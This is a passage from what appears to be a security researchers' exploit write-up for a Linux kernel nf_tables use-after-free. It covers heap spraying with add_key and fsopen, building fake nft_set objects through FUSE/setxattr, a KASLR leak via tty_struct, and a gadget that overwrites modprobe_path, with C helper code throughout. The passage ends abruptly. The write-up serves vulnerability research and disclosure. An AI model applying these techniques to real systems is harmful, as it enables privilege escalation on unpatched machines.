                 struct nft_set_binding *binding, bool event)
{
    list_del_rcu(&binding->list);

    if (list_empty(&set->bindings) && nft_set_is_anonymous(set)) {
        list_del_rcu(&set->list);
        if (event)
            nf_tables_set_notify(ctx, set, NFT_MSG_DELSET,
                         GFP_KERNEL);
    }
}

So if there was a proper deactivation, the expression would have been removed from the bindings list. However, in our case, this actually never occurred but the expression is still freed. This means that the set that was looked up now contains a dangling pointer on the bindings list. In the case of the KASAN report, the use-after-free occurs because yet another set is created containing yet another embedded “lookup” expression that looks up the same set that already has the dangling pointer on its bindings list, which will cause the second “lookup” expression to be inserted onto that same list, which will in turn update the linkage of the dangling pointer.

Initial Limited UAF Write

We also found that one other expression will be bound to a set in a similar way to the nft_lookup expression, and that is nft_dynset. We can use either of these expressions for exploitation, and as we will see one benefited us more than the other.

To describe this more visually, the following process can erroneously occur.

Firstly, we trigger the vulnerability while adding a nft_dynset expression to the set->bindings list:

This will fail as stateful expressions should not be used during set creation.

Then, we remove the legitimate expression from the bindings list and we end up with a dangling next pointer on the bindings list pointing to a free’d expression.

Finally, by adding another expression to the bindings list, we can cause a UAF write to occur as the prev field will be updated to point to the newly inserted expression (not shown in the above diagram).

Exploitation

Building an Initial Plan

We now know we can create a set with some dangling entry on its bindings list. The first question is how can we best abuse this dangling entry to do something more useful?

We are extremely limited by what can be written into the UAF chunk. Really, there’s two possibilities of what can be done:

  1. Write an address pointing to &expression->bindings of another expression that is added in set->bindings list after the UAF is triggered. Interestingly, this additional expression could also be used-after-free if we wanted, so in theory this would mean that the address might point to a subsequent replacement object that contained some more controlled data.

  2. Write the address of &set->bindings into the UAF chunk.

Offsets We Can Write at Into the UAF Chunk

We are interested in knowing at what offset into the UAF chunk this uncontrolled address is written. This will also differ depending on which expression type we choose to trigger the bug with.

For the nft_lookup expression:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L18
struct nft_lookup {
    struct nft_set * set;
    u8 sreg;
    u8 dreg;
    bool invert;
    struct nft_set_binding binding;
};

And the offset information courtesy of pahole:

struct nft_lookup {
    struct nft_set * set; /* 0 8 */
    u8 sreg; /* 8 1 */
    u8 dreg; /* 9 1 */
    bool invert; /* 10 1 */

    /* XXX 5 bytes hole, try to pack */

    struct nft_set_binding binding; /* 16 32 */

    /* XXX last struct has 4 bytes of padding */

    /* size: 48, cachelines: 1, members: 5 */
    /* sum members: 43, holes: 1, sum holes: 5 */
    /* paddings: 1, sum paddings: 4 */
    /* last cacheline: 48 bytes */
};

For the nft_dynset expression:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_dynset.c#L15
struct nft_dynset {
    struct nft_set            *set;
    struct nft_set_ext_tmpl        tmpl;
    enum nft_dynset_ops        op:8;
    u8                sreg_key;
    u8                sreg_data;
    bool                invert;
    bool                expr;
    u8                num_exprs;
    u64                timeout;
    struct nft_expr            *expr_array[NFT_SET_EXPR_MAX];
    struct nft_set_binding        binding;
};

And the pahole results:

struct nft_dynset {
    struct nft_set *           set;                  /*     0     8 */
    struct nft_set_ext_tmpl    tmpl;                 /*     8    12 */

    /* XXX last struct has 1 byte of padding */

    enum nft_dynset_ops        op:8;                 /*    20: 0  4 */

    /* Bitfield combined with next fields */

    u8                         sreg_key;             /*    21     1 */
    u8                         sreg_data;            /*    22     1 */
    bool                       invert;               /*    23     1 */
    bool                       expr;                 /*    24     1 */
    u8                         num_exprs;            /*    25     1 */

    /* XXX 6 bytes hole, try to pack */

    u64                        timeout;              /*    32     8 */
    struct nft_expr *          expr_array[2];        /*    40    16 */
    struct nft_set_binding     binding;              /*    56    32 */

    /* XXX last struct has 4 bytes of padding */

    /* size: 88, cachelines: 2, members: 11 */
    /* sum members: 81, holes: 1, sum holes: 6 */
    /* sum bitfield members: 8 bits (1 bytes) */
    /* paddings: 2, sum paddings: 5 */
    /* last cacheline: 24 bytes */
};

The first element of the nft_set_binding structure is the list_head structure:

struct list_head {
     struct list_head *next, *prev;
};

The expressions structures like nft_lookup and nft_dynset are prefixed with a nft_expr structure of size 8.

So for nft_lookup the writes will occur at offsets 24 (next) and 32 (prev). For nft_dynset they will occur at offsets 64 (next) and 72 (prev). We can also confirm this by looking at the KASAN report output.

Hunting for Replacement Objects

So we can start looking for other structures with the same size that we can allocate from userland, and with interesting members at the previously mentioned offsets.

We have two options on how to abuse the UAF write after re-allocating some object to replace the UAF chunk:

  1. We could try to leak the written address out to userland.
  2. We could use the limited UAF write to corrupt some interesting structure member, and use that to try to build a more useful primitive.

We will actually have to do both but for now we will focus on 2.

We ended up using CodeQL to look for interesting structures. We were specifically looking for structures with pointers at one of the relevant offsets.

A copy of the CodeQL query used to find this object is as follows:

/**
 * @name kmalloc-96
 * @kind problem
 * @problem.severity warning
 */
import cpp

// The offsets we care about are 64 and 72.

from FunctionCall fc, Type t, Variable v, Field f, Type t2
where (fc.getTarget().hasName("kmalloc") or
       fc.getTarget().hasName("kzalloc") or
       fc.getTarget().hasName("kcalloc"))
      and
      exists(Assignment assign | assign.getRValue() = fc and
             assign.getLValue() = v.getAnAccess() and
             v.getType().(PointerType).refersToDirectly(t)) and
      t.getSize() <= 96 and t.getSize() > 64 and t.fromSource() and
      f.getDeclaringType() = t and
      (f.getType().(PointerType).refersTo(t2) and t2.getSize() <= 8) and
      (f.getByteOffset() = 72)
select fc, t, fc.getLocation()

After lots of searching, we found an interesting candidate in the structure called cgroup_fs_context. This structure is allocated on kmalloc-96, so it could be used to replace a nft_dynset.

//https://elixir.bootlin.com/linux/v5.13/source/kernel/cgroup/cgroup-internal.h#L46
/*
 * The cgroup filesystem superblock creation/mount context.
 */
struct cgroup_fs_context {
    struct kernfs_fs_context kfc;
    struct cgroup_root    *root;
    struct cgroup_namespace    *ns;
    unsigned int    flags;            /* CGRP_ROOT_* flags */

    /* cgroup1 bits */
    bool        cpuset_clone_children;
    bool        none;            /* User explicitly requested empty subsystem */
    bool        all_ss;            /* Seen 'all' option */
    u16        subsys_mask;        /* Selected subsystems */
    char        *name;            /* Hierarchy name */
    char        *release_agent;        /* Path for release notifications */
};

Using pahole, we can see the structure’s layout is as follows:

struct cgroup_fs_context {
    struct kernfs_fs_context   kfc;                  /*     0    32 */

    /* XXX last struct has 7 bytes of padding */

    struct cgroup_root *       root;                 /*    32     8 */
    struct cgroup_namespace *  ns;                   /*    40     8 */
    unsigned int               flags;                /*    48     4 */
    bool                       cpuset_clone_children; /*    52     1 */
    bool                       none;                 /*    53     1 */
    bool                       all_ss;               /*    54     1 */

    /* XXX 1 byte hole, try to pack */

    u16                        subsys_mask;          /*    56     2 */

    /* XXX 6 bytes hole, try to pack */

    /* --- cacheline 1 boundary (64 bytes) --- */
    char *                     name;                 /*    64     8 */
    char *                     release_agent;        /*    72     8 */

    /* size: 80, cachelines: 2, members: 10 */
    /* sum members: 73, holes: 2, sum holes: 7 */
    /* paddings: 1, sum paddings: 7 */
    /* last cacheline: 16 bytes */
};

We can see above that the name and release_agent members will overlap with the binding member of nft_dynset. This means we could overwrite them with a pointer relative to a set or another expression with our limited UAF write primitive.

Taking a look at the routine for creating a cgroup_fs_context, we come across the cgroup_init_fs_context() function:

/*
 * This is ugly, but preserves the userspace API for existing cpuset
 * users. If someone tries to mount the "cpuset" filesystem, we
 * silently switch it to mount "cgroup" instead
 */
static int cpuset_init_fs_context(struct fs_context *fc)
{
    char *agent = kstrdup("/sbin/cpuset_release_agent", GFP_USER);
    struct cgroup_fs_context *ctx;
    int err;

    err = cgroup_init_fs_context(fc);
    if (err) {
        kfree(agent);
        return err;
    }

    fc->ops = &cpuset_fs_context_ops;

    ctx = cgroup_fc2context(fc);
    ctx->subsys_mask = 1 << cpuset_cgrp_id;
    ctx->flags |= CGRP_ROOT_NOPREFIX;
    ctx->release_agent = agent;

    get_filesystem(&cgroup_fs_type);
    put_filesystem(fc->fs_type);
    fc->fs_type = &cgroup_fs_type;

    return 0;
}

This is where the cgroup_init_fs_context() is used for the actual allocation:

//https://elixir.bootlin.com/linux/v5.13/source/kernel/cgroup/cgroup.c#L2123
/*
 * Initialise the cgroup filesystem creation/reconfiguration context.  Notably,
 * we select the namespace we're going to use.
 */
static int cgroup_init_fs_context(struct fs_context *fc)
{
    struct cgroup_fs_context *ctx;

    ctx = kzalloc(sizeof(struct cgroup_fs_context), GFP_KERNEL);
    if (!ctx)
        return -ENOMEM;
[...]
}

In order to trigger this allocation, we can simply call the fsopen() system call and pass the "cgroup2" argument. If we want to free it after the fact, we can simply close the file descriptor (that was returned by fsopen()) with close(), and we can trigger the following code:

/*
 * Destroy a cgroup filesystem context.
 */
static void cgroup_fs_context_free(struct fs_context *fc)
{
    struct cgroup_fs_context *ctx = cgroup_fc2context(fc);

    kfree(ctx->name);
    kfree(ctx->release_agent);
    put_cgroup_ns(ctx->ns);
    kernfs_free_fs_context(fc);
    kfree(ctx);
}

We see that both name or release_agent are freed, so either are good candidates for corrupting during our limited UAF write.

What Pointer Do We Want to Arbitrary Free?

So now the next question is: if we use our limited UAF write to corrupt one of these pointers and free it by calling close(), what should we be freeing? A pointer relative to a set or an expression?

Arbitrary Freeing an Expression

If we free a “dynset” expression, we are going to be freeing the memory from &nft_dynset->bindings until 96-offsetof(nft_dynset->bindings). The bindings member is the last member of the structure, so the majority of the corruption would be whatever target object is adjacent on the slab cache (or potentially an adjacent cache). This is potentially good or bad… it means we can potentially replace and corrupt the contents of an adjacent target object. It is somewhat bad in that the randomized layout of slabs doesn’t necessarily let us know exactly which target object we will be able to corrupt, which adds extra complexity. We can’t leak what target object is adjacent or test whether or not the expression we are freeing is the last of one slab cache, so using this approach would be blind.

The following sequence of diagrams shows what freeing a target object adjacent to the expression would look like.

Above we assume that we’ve got a setup where we can write to some “free primitive” object by linking in some new expression that is added to the bindings list after our UAF is triggered. For the sake of example, we just say “primitive_object”, but in our exploit, it is actually a cgroup_fs_context structure.

This means we can destroy “primitive_object” from userland in order to free the kernel pointer that that was written into ptr1. In our exploit, this would be destroying a “cgroup” in order to free cgroup_fs_context, which in turn will free cgroup_fs_context->name.

Finally, we actually destroy the “primitive_object” from userland in order to free the kernel address, which gives us a free chunk overlapping both the expression object and some adjacent target object.

From here, we could replace the newly freed overlapping chunk with something like a setxattr() allocation, which would let us control the data, but as mentioned before we don’t easily know what is adjacent and it adds unpredictability to what will already be a fairly complex setup. This is especially annoying in the case that the expression you are targeting is the last object in a slab cache, because it is harder to know what is on the adjacent cache, though there was a good paper about this recently by @ETenal7.

Arbitrary Freeing a Set

On the other hand, if we free an address relative to the set, we are freeing from the address of &nft_set->bindings, which is only at offset 0x10. This means that we can free and replace the vast majority of a nft_set structure, but continue to interact with it as if it was legitimate. This also means we don’t have to rely on knowing the adjacent chunk.

After doing some investigation into options and what would potentially be exploitable, we opted to try to target nft_set. Next, we will take a look at why we thought this was potentially a very powerful target. At this point, we only know we can free some other structure type, so we still have a long way to go.

First, let’s revisit the nft_set structure and see what potential it has, assuming we can use-after-free it.

There are a number of useful members that we touched on earlier, but we can now review them within the context of exploitation.

Setting and Leaking Data

There are two interesting members of the nft_set related to leaking and controlling data.

  • udata: A pointer into the set’s data inline array (which holds user supplied data).
  • udlen: The length of user defined data stored in the set’s data array.

What this means is that:

  1. It is possible to pass arbitrary data which will be stored within the set object.
  2. In the case of an attacker controlling the udata pointer, this can then be used to leak arbitrary data from kernel space to user space up to the length of udlen by using the userland APIs to fetch the set.

Querying the Set by Name or ID

In order to look up a set, one of the following members is used, depending on the functionality:

  • name: The name of the set is often required.
  • handle: Certain APIs can lookup a nft_set by handle alone.

This means that if it was not possible to avoid corrupting the name, then it may still be possible to use certain APIs with the handle alone.

Set Function Table

The ops member of nft_set contains a pointer to a function table of set operations nft_set_ops:

/**
 *    struct nft_set_ops - nf_tables set operations
 *
 *    @lookup: look up an element within the set
 *    @update: update an element if exists, add it if doesn't exist
 *    @delete: delete an element
 *    @insert: insert new element into set
 *    @activate: activate new element in the next generation
 *    @deactivate: lookup for element and deactivate it in the next generation
 *    @flush: deactivate element in the next generation
 *    @remove: remove element from set
 *    @walk: iterate over all set elements
 *    @get: get set elements
 *    @privsize: function to return size of set private data
 *    @init: initialize private data of new set instance
 *    @destroy: destroy private data of set instance
 *    @elemsize: element private size
 *
 *    Operations lookup, update and delete have simpler interfaces, are faster
 *    and currently only used in the packet path. All the rest are slower,
 *    control plane functions.
 */
struct nft_set_ops {
    bool                (*lookup)(const struct net *net,
                          const struct nft_set *set,
                          const u32 *key,
                          const struct nft_set_ext **ext);
    bool                (*update)(struct nft_set *set,
                          const u32 *key,
                          void *(*new)(struct nft_set *,
                                   const struct nft_expr *,
                                   struct nft_regs *),
                          const struct nft_expr *expr,
                          struct nft_regs *regs,
                          const struct nft_set_ext **ext);
    bool                (*delete)(const struct nft_set *set,
                          const u32 *key);

    int                (*insert)(const struct net *net,
                          const struct nft_set *set,
                          const struct nft_set_elem *elem,
                          struct nft_set_ext **ext);
    void                (*activate)(const struct net *net,
                            const struct nft_set *set,
                            const struct nft_set_elem *elem);
    void *                (*deactivate)(const struct net *net,
                              const struct nft_set *set,
                              const struct nft_set_elem *elem);
    bool                (*flush)(const struct net *net,
                         const struct nft_set *set,
                         void *priv);
    void                (*remove)(const struct net *net,
                          const struct nft_set *set,
                          const struct nft_set_elem *elem);
    void                (*walk)(const struct nft_ctx *ctx,
                        struct nft_set *set,
                        struct nft_set_iter *iter);
    void *                (*get)(const struct net *net,
                           const struct nft_set *set,
                           const struct nft_set_elem *elem,
                           unsigned int flags);

    u64                (*privsize)(const struct nlattr * const nla[],
                            const struct nft_set_desc *desc);
    bool                (*estimate)(const struct nft_set_desc *desc,
                            u32 features,
                            struct nft_set_estimate *est);
    int                (*init)(const struct nft_set *set,
                        const struct nft_set_desc *desc,
                        const struct nlattr * const nla[]);
    void                (*destroy)(const struct nft_set *set);
    void                (*gc_init)(const struct nft_set *set);

    unsigned int            elemsize;
};

Therefore, if it is possible to hijack any of these function pointers or fake the table itself, then it may be possible to leverage this to control the instruction pointer and start executing a ROP chain.

Building the Exploit

So now that we know we want to free a nft_set to build better primitives, we still have three immediate things to solve:

  1. In order to use certain features of a controlled nft_set after replacing it with a fake set, we are going to need to leak some other kernel address where we control some memory.
  2. We need to write the target set address to the UAF chunk corrupting the cgroup_fs_context structure, in order to free it afterwards.
  3. Once we free the nft_set, we need some mechanism that allows us to replace the contents with completely controlled data to construct a malicious fake set that allows us to use our new primitives.

Let’s approach each problem one by one and outline a solution.

Problem One: Leaking Some Slab Address

In order to abuse a UAF of a nft_set we will need to leak a kernel address.

If we want to provide a controlled pointer for something like nft_set->udata, then we need to know some existing kernel address in the first place. This is actually quite easy to solve by just exploiting our existing UAF bug in a slightly different way.

We just need to bind an expression to the set we are targeting in advance, so that the set->bindings list already has one member. Then, we trigger the vulnerability to add the dangling pointer to the list. Finally, we can simply remove the preexisting list entry. Since it is a doubly link list, the removal will update the prev entry of the following member on the list.

Since we know that we can write the address of a set to a new chunk, we can theoretically use some structure or buffer that we could read the contents of after the fact back to userland to leak what is written by the unlink operation. We opted to do this using the user_key_payload structure, since the pointer is written to the payload portion of the user_key_payload structure which we can easily read from user space.

The kernel heap spray technique using add_key is pretty well known for using a controlled length. It is also possible to both control when this gets free’d and also to read back the data.

Each user_key_payload has a header followed by the data provided:

struct user_key_payload {
    struct rcu_head rcu;
    unsigned short datalen;
};

We can spray user_key_payload as follows:

inline int32_t
key_alloc(char * description, int8_t * payload, int32_t payload_len)
{
    return syscall(
        __NR_add_key,
        "user",
        description,
        payload,
        payload_len,
        KEY_SPEC_PROCESS_KEYRING);
}

inline void
key_spray(int32_t * keys,
                    int32_t spray_count,
                    int8_t * payload,
                    int32_t payload_len,
                    char * description,
                    int32_t description_len)
{
    for (int32_t i = 0; i < spray_count; i++) {
        snprintf(description + description_len, 100, "_%d", i);
        keys[i] = key_alloc(description, payload, payload_len);
        if (keys[i] == -1) {
            perror("add_key");
            break;
        }
    }
}

We can also control when the free occurs using KEYCTL_UNLINK:

inline int32_t
key_free(int32_t key_id)
{
    return syscall(
        __NR_keyctl,
        KEYCTL_UNLINK,
        key_id,
        KEY_SPEC_PROCESS_KEYRING);
}

And we can read back the content of the payload after corruption has occurred using KEYCTL_READ and leak the set pointer back to userland:

int32_t err = syscall(
            __NR_keyctl,
            KEYCTL_READ,
            keys[i],
            payload,
            payload_len);
        if (err == -1) {
            perror("keyctl_read");
        }

Visually, the leakage process based on user_key_payload looks as follows.

To help us keep track of this, we introduce new naming convention. SET1 refers to the nft_set that is targeted the first time we trigger the vulnerability, and leak the SET1 address into a user_key_payload payload. This first triggering of the vulnerability we will refer to as UAF1. We will include these terms in the exploit glossary at the end of this blog post, as they are used throughout this document.

We bind a “dynset” expression to SET1, which already has one legitimate expression on its bindings list:

The “dynset” expression is deemed invalid because it is not stateful, and so freed, leaving its address dangling on the bindings list:

We allocate a user_key_payload object to replace the hole left by freeing “dynset”:

Finally, we destroy the legitimate expression to update the linkage on the bindings list, effectively writing the address of SET1->bindings into the user_key_payload object, which can then be read from userland:

This means we will now trigger the limited UAF write twice: for leaking some kernel address and then for corrupting some structure. It also means that we are going to be using two different sets, one for each time the bug is triggered.

A funny side note around this stage, is that one of us was doing the testing on VMWare. This stage of the exploit was extremely unreliable on VMWare, and very rarely the user_key_payload chunk would replace the UAF dynset expression chunk. Moreover, the system would typically encounter an unrecoverable OOPS. After a bunch of investigation, we realized that this was due to the combination of a debug message being printed prior to the user_key_payload, and the associated graphical output handling in the VMWare graphics driver resulted in the exact same size object always being allocated prior to us actually triggering the user_key_payload allocation.

These types of little reliability quirks are things we often run into, but not a lot of people talk about. Kyle Zeng discusses in a recent paper how you need to minimize any sort of noise between the point you free a chunk and when you actually replace it. This is a good example of where this was needed but also just the development practice of having debug output gets in the way.

Problem Two: Preparing a Set Freeing Primitive

Now that we have leaked the address of SET1, we need to figure out how we can write the set address into a UAF chunk corrupting the cgroup_fs_context structure. Actually, it is very similar to what we did above, but instead of using a user_key_payload we just use cgroup_fs_context, which will let us overwrite cgroup_fs_context->release_agent with &set->bindings .

Following, SET2 will refer to the nft_set that is targeted the second time we trigger the bug. We also referred to this second UAF as UAF2.

Visually this process looks as follows.

Once again, we add a “dynset” to the bindings list of a set:

The “dynset” object will be freed after being deemed invalid, due to being non-stateful. It is left dangling on the bindings list:

We replace the hole left by the “dynset” object, with a cgroup_fs_context object:

We free the legitimate expression to write the address of SET2->bindings overtop of cgroups_fs_context->release_agent:

Doing the allocation of cgroup_fs_context looks like the following:

inline int
fsopen(const char * fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

void 
cgroup_spray(int spray_count, int * array_cgroup, int start_index, int thread_index)
{
    int i = 0;
    for (i = 0; i < spray_count; i++) {
        int fd = fsopen("cgroup2", 0);
        if (-1 == fd) {
            perror("fsopen");
            break;
        }

        array_cgroup[start_index+i] = fd;
    }
}

And this is for freeing them:

void
cgroup_free_array(int * cgroup, int count)
{
    for (int i = 0; i < count; i++) {
        cgroup_free(cgroup[i]);
    }
}

inline void
cgroup_free(int fd)
{
    close(fd);
}

Now that we are able to write an address relatively to SET2 into the cgroup->release_agent field, we know we can free the SET2 by freeing the cgroup.

Problem Three: Building a Fake Set

Finally, after we free the SET2 by closing the cgroup, we need some mechanism that allows us to replace it contents with completely controlled data to construct a malicious fake set that allows us to build new primitives.

Since we needed to control a lot of the data, we thought about msg_msg. However, msg_msg won’t be on the same slab cache for the 5.15 kernel version we are targeting (due to a new set of kmalloc-cg-* caches being introduced in 5.14).

We opted to use the popular FUSE/setxattr() combination. We won’t get into detail on this as it has been covered by many articles previously, e.g.:

This lets us control all of the values in SET2. By carefully crafting them, it allows us to continue to interact with the set as if it were real. We will refer to the first fake set that we create as FAKESET1. We will refer to the process of freeing SET2 and replacing it with FAKESET1 as UAF3.

At this point, we visually have the following.

Before freeing the cgroup:

After freeing the &SET2->bindings by closing the cgroup file descriptor:

After replacing SET2 with FAKESET1, we use setxattr() to make an allocated object that will be blocked during the data copy by FUSE server:

By having a FAKESET1->udata value pointing at SET1, this opens up some more powerful memory revelation possibilities:

We are starting to have good exploitation primitives to work with but we still have a long way to go!

Bypassing KASLR

The next challenge which we faced was how do we bypass KASLR?

Our goal will eventually be to try to swap out the ops function table in a set, and in order to point it at new functions, we will need to populate some memory with KASLR-aware pointers and then point ops to this location. We can’t simply point it at SET1 in advance, even though we can provide data inside of SET1 user data section. This is because we have not bypassed KASLR at this stage, so we can’t pre-populate valid pointers in that location (chicken and egg problem).

However, we did come up with one trick which is to leak the address of SET2 when leaking SET1 contents. This is possible because, as mentioned earlier, when you add sets they are associated with the table, and all of the sets in the same table are on a linked list. We can abuse this by ensuring that SET1 and SET2 are both associated with this same table. What this means is that the first entry of SET1->list will point to SET2.

/**
 *    struct nft_table - nf_tables table
 *
 *    @list: used internally
 *    @chains_ht: chains in the table
 *    @chains: same, for stable walks
 *    @sets: sets in the table
      [...]
 */
struct nft_table {
    struct list_head list;
    struct rhltable  chains_ht;
    struct list_head chains;
    struct list_head sets;
    [...]
};

Above we can see the nft_table structure. We just want to highlight the sets member, which will be the list that sets are on when associated with the same table.

Given we just said we can’t update SET1 after the fact, under normal circumstances that would mean that we can’t update SET2 after the fact either, right? However, because SET2 is now in a state where the contents are controlled by FAKESET1, it means we can actually free it again by releasing the FUSE/setxattr() and replacing it again with a new fake set FAKESET2, where we add addresses that we leaked from abusing FAKESET1 for memory revelation.

That’s our plan at least. We still don’t have a way to bypass KASLR. We can leak some code addresses in so far as we can leak the address of nf_tables.ko via SET1->ops, but this is a relatively small kernel module and we would much rather be able to dump the address of the full kernel image itself since it opens up much more possibility for things like ROP gadgets.

The idea we had was that we can already leak the contents of SET1 thanks to our FAKESET1 replacing SET2. To do this, we simply point FAKESET1->udata to SET1. However on top of that, we can actually control the length of data that we can read, which can be significantly larger than the size of SET1. By adjusting FAKESET1->udlen to be larger than the size of a set, we can just easily leak adjacent chunks. This means that before allocating SET1, we can also prepare kernel memory such that SET1 is allocated before some object type that has a function pointer that will allow us to defeat KASLR.

After some investigation we chose to use the tty_struct structure, which has two versions (master and slave) but both end up pointing to the kernel, and can be used to defeat KASLR. The only problem is that tty_struct is allocated on kmalloc-1k, whereas nft_set is allocated on kmalloc-512. To address this problem, we realized that when we create the set we can supply a small amount of user data that will be stored inline in the object, and the length of this data will dictate the size of the allocation. The default size is very close to 512, so just supplying a little bit of data is enough to push it over the edge and cause the set to be allocated on kmalloc-1k.

An example of another recent exploit using tty_struct is as follows.

As an example, we will show creating a dynamic set with controlled user data using nftnl_set_set_data() from libnftnl:

/**
 * Create a dynamic nftnl_set in userland using libnftnl
 *
 *
 * @param[in] table_name: the table name to link the set to
 * @param[in] set_name: the set name to create
 * @param[in] family: at what network level the table needs to be created (e.g. AF_INET)
 * @param[in] set_id:
 * @param[in] expr:
 * @param[in] expr_count:
 * @return the created nftnl_set
 */
struct nftnl_set *
build_set_dynamic(char * table_name, char * set_name, uint16_t family, uint32_t set_id, struct nftnl_expr ** expr, uint32_t expr_count, char * user_data, int data_len)
{
    struct nftnl_set * s;

    s = nftnl_set_alloc();

    nftnl_set_set_str(s, NFTNL_SET_TABLE, table_name);
    nftnl_set_set_str(s, NFTNL_SET_NAME, set_name);
    nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, 1);
    nftnl_set_set_u32(s, NFTNL_SET_FAMILY, family);
    nftnl_set_set_u32(s, NFTNL_SET_ID, set_id);

    // NFTA_SET_FLAGS this is a bitmask of enum nft_set_flags
    uint32_t flags = NFT_SET_EVAL;
    nftnl_set_set_u32(s, NFTNL_SET_FLAGS, flags);

    // If an expression exists then add it.

    if (expr && expr_count != 0) {
        if (expr_count > 1) {
            nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_EXPR);
        }

        for (uint32_t i = 0; i < expr_count; ++i) {
            nftnl_set_add_expr(s, *expr++);
        }
    }

    if (user_data && data_len > 0) {
        // the data len is set automatically
        // ubuntu_22.04_kernel_5.15.0-27/net/netfilter/nf_tables_api.c#1129
        nftnl_set_set_data(s, NFTNL_SET_USERDATA, user_data, data_len);
    }

    return s;
}

In order to be relatively sure that a tty_struct is adjacent to the nft_set, we can spray a small number of them to make sure any holes are filled on other slabs, then allocate the set, and finally spray a few more such that at minimum a complete slab will have been filled.

There are still some scenarios where this could technically fail, specifically because of the random layout of slab objects on a cache. Indeed, it is possible that the SET1 object is at the very last slot of the slab, and thus reading out of bounds will end up reading whatever is adjacent. This might be a completely different slab type. We thought of one convenient way of detecting this which is that because a given slab size has a constant offset for each object on this slab, and we know the size of the nft_set objects, when we leak the address of SET1, we can actually determine whether or not it is in the last slot of the slab, in which case we can just start the exploit again by allocating a new SET1.

This calculation is quite easy, as long as you know the size of the objects and the number of objects on the cache:

bool
is_last_slab_slot(uintptr_t addr, uint32_t size, int32_t count)
{
    uint32_t last_slot_offset = size*(count - 1);
    if ((addr & last_slot_offset) == last_slot_offset) {
        return true;
    }
    return false;
}

This is convenient in that it lets us short circuit the whole exploit process after UAF1, and starting from the beginning rather than waiting all the way until we are done with UAF4 to see that it failed.

Getting Code Execution

So now that we can bypass KASLR, we can setup another fake set which has a ops function pointing to legitimate addresses and work towards getting code execution. This final fake set we refer to as FAKESET2. In order to create it, we simply free FAKESET1 by unblocking the setxattr() call via FUSE, and then immediately reallocating the same memory with another setxattr() call blocked by FUSE. This final stage we refer to as UAF4.

In addition to controlling ops, we again obviously control a fair bit of data inside of FAKESET2 that may help us with something like a stack pivot or other ROP gadget. So the next step is to try to find what kind of control we have when executing the function pointers exposed by our ops. This turned out to be an interesting challenge, because the registers controlled for most of the functions exposed by ops are actually very limited.

We started off by mapping out each possible function call and what registers could be controlled.

An example of a few are as follows:

// called by nft_setelem_get():
// rsi = set
// r12 = set
void * (*get)(const struct net *net,
              const struct nft_set *set,
              const struct nft_set_elem *elem,
              unsigned int flags);
// called by nft_set_destroy():
// rdi = set
// r12 = set
void (*destroy)(const struct nft_set *set);
// called by nft_set_elem_expr_alloc():
// r14 = set
// rdi = set
void (*gc_init)(const struct nft_set *set);

RIP Control by Triggering Garbage Collection

In the end, we decided to try to target the set->ops->gc_init function pointer, because the register control seemed slightly better for ROP gadget hunting.

struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                     const struct nft_set *set,
                     const struct nlattr *attr)
{
    struct nft_expr *expr;
    int err;

    expr = nft_expr_init(ctx, attr);
    if (IS_ERR(expr))
        return expr;

    err = -EOPNOTSUPP;
    if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
        goto err_set_elem_expr;

[1] if (expr->ops->type->flags & NFT_EXPR_GC) {
        if (set->flags & NFT_SET_TIMEOUT)
            goto err_set_elem_expr;
[2]     if (!set->ops->gc_init)
            goto err_set_elem_expr;
[3]     set->ops->gc_init(set);
    }

First, we had to figure out how we could call this function in general. The majority of expressions do not actually expose a gc_init() function at all ([2] checks this), which precludes the use of most of them.

We did find that the nft_connlimit expression will work as it is one of the only ones that has this garbage collection flag.

We just need to make sure that the right kernel module has been loaded in advance, as it wasn’t by default. Loading the module via commandline can be done with something like this:

nft add table ip filter
nft add chain ip filter input '{ type filter hook input priority 0; }'
nft add rule ip filter input tcp dport 22 ct count 10 counter accept

This allows the user to create a nft_connlimit expression to reach the gc_init() function by simply creating an expression and adding it to a set:

nftnl_expr_alloc("connlimit");

modprobe_path Overwrite

It was quite difficult to find good gadgets, but eventually we did find one (which is actually a function), that did roughly what we needed. The caveat is that we couldn’t avoid it crashing in the process of triggering an arbitrary write but the OOPS is recoverable so it didn’t matter much…

Let’s take a look at __hlist_del:

pwndbg> x/10i __hlist_del
   0xffffffff812795d0 <perf_swevent_del>:       mov    rax,QWORD PTR [rdi+0x60]  ; this overlaps with set->field_count and set->use
   0xffffffff812795d4 <perf_swevent_del+4>:     mov    rdx,QWORD PTR [rdi+0x68]  ; this overlaps with set->nelems
   0xffffffff812795d8 <perf_swevent_del+8>:     mov    QWORD PTR [rdx],rax       ; this lets us write to modprobe_path
   0xffffffff812795db <perf_swevent_del+11>:    test   rax,rax
   0xffffffff812795de <perf_swevent_del+14>:    je     0xffffffff812795e4 <perf_swevent_del+20>
   0xffffffff812795e0 <perf_swevent_del+16>:    mov    QWORD PTR [rax+0x8],rdx   ; this will OOPS but is safe to do
   0xffffffff812795e4 <perf_swevent_del+20>:    movabs rax,0xdead000000000122
   0xffffffff812795ee <perf_swevent_del+30>:    mov    QWORD PTR [rdi+0x68],rax
   0xffffffff812795f2 <perf_swevent_del+34>:    ret

This function is basically just responsible for doing an unsafe unlink on a doubly-linked list.

When this gets called, rdi points to our FAKESET2. We can see that a 64-bit value at rdi+0x60 is read into rax. Next, a 64-bit value at rdi+0x68 is read in to rdx. Then, rax is written to [rdx]. This actually allows us to trigger a write of a fully controlled value to a fully controlled address. The main problem we have is that rax ideally is a valid address too, since the rdx pointer will also be written back to [rax+8], as we would expect from a doubly-linked unlink operation.

Fortunately for us, Ubuntu enabled support for noncritical kernel oops by default and the faulting thread is a kernel worker thread. Documented as follows:

panic_on_oops:

Controls the kernel's behaviour when an oops or BUG is encountered.

0: try to continue operation

1: panic immediately.  If the `panic' sysctl is also non-zero then the
   machine will be rebooted.

What this means is that we can actually use the first write as a almost-arbitrary write primitive, and just allow the second write to [rax+8] to oops. This will print a kernel oops to the system log, but it otherwise has no adverse effects on the system and the kernel will keep chugging along with the value that we had written earlier.

Interestingly this is similar to a technique that Starlabs used with __list_del, but in our case it is simpler because we just rely on panic_on_oops=0 and don’t need to leak the physmap.

Visually the use of this ROP gadget looks as follows.

Before replacing SET2 (actually FAKESET1) with FAKESET2:

After replacing SET2 with FAKESET2:

Actual controlled data:

